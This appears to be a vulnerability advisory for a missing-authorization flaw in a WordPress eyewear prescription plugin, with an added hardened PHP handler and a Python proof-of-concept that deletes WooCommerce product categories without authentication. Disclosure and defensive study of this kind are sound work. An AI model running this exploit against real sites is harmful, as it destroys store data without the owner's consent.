Security Vulnerability Report
CVE-2025-14365 CVSS 5.3 MEDIUM

CVE-2025-14365

Published: 2025-12-13 16:16:48
Last Modified: 2026-04-15 00:35:42

Description

The Eyewear prescription form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.0.1. This is due to missing capability checks on the RemoveItems AJAX action. This makes it possible for unauthenticated attackers to delete arbitrary WooCommerce product categories, including all of their child categories, via the 'catIds' parameter.
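As an added example (not the plugin's code and not from the page), this is the shape of a WordPress AJAX handler for an action like RemoveItems with the controls whose absence the description names: no `wp_ajax_nopriv_` registration, a nonce check, and a capability check before any category is deleted. The callback name, nonce action and response messages are assumptions.

```php
<?php
// Added example, not the plugin's code. Demonstrates the authorization
// controls for a category-removal AJAX action such as RemoveItems.

// Registered for logged-in users only: there is deliberately no
// wp_ajax_nopriv_RemoveItems twin, so unauthenticated requests never
// reach the callback.
add_action( 'wp_ajax_RemoveItems', 'epf_example_remove_items' );

function epf_example_remove_items() {
    // 1. CSRF: the request must carry a nonce issued to this user
    //    (nonce action name is hypothetical).
    check_ajax_referer( 'epf_remove_items', 'nonce' );

    // 2. Authorization: the capability check missing in CVE-2025-14365.
    //    delete_product_terms is the WooCommerce capability that governs
    //    removing product categories.
    if ( ! current_user_can( 'delete_product_terms' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 3. Input validation: coerce every supplied id to a positive integer
    //    and drop anything that is not one.
    $raw_ids = isset( $_POST['catIds'] ) ? (array) wp_unslash( $_POST['catIds'] ) : array();
    $cat_ids = array_filter( array_map( 'absint', $raw_ids ) );
    if ( empty( $cat_ids ) ) {
        wp_send_json_error( array( 'message' => 'no category ids supplied' ), 400 );
    }

    $deleted = array();
    foreach ( $cat_ids as $cat_id ) {
        // Only act on ids that really are product categories.
        $term = get_term( $cat_id, 'product_cat' );
        if ( ! $term || is_wp_error( $term ) ) {
            continue;
        }
        if ( true === wp_delete_term( $cat_id, 'product_cat' ) ) {
            $deleted[] = $cat_id;
        }
    }

    wp_send_json_success( array( 'deleted' => $deleted ) );
}
```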

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Eyewear prescription form plugin <= 6.0.1 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-14365 PoC - Missing Authorization in Eyewear prescription form plugin
# Affected: WordPress Eyewear prescription form plugin <= 6.0.1

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-site.com"

# The vulnerable AJAX endpoint
ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# Category IDs to delete (modify as needed)
category_ids = [1, 2, 3]  # Example category IDs

# Construct the PoC request
data = {
    "action": "RemoveItems",
    "catIds": category_ids
}

print(f"[*] Sending request to {ajax_endpoint}")
print(f"[*] Target categories to delete: {category_ids}")

try:
    # No authentication required (PR:N in CVSS)
    response = requests.post(ajax_endpoint, data=data, timeout=10)
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response: {response.text}")
    if response.status_code == 200:
        print("[+] Request sent successfully - categories may have been deleted")
    else:
        print("[-] Request failed")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

print("\n[*] Mitigation: Upgrade to version 6.0.2 or later")
print("[*] Reference: https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L326")
```

References

Weakness: CWE-862 (Missing Authorization)

- https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L326
- https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L74
- https://www.wordfence.com/threat-intel/vulnerabilities/id/b85fc103-20e5-4599-8ed5-5bd5d9c447ee?source=cve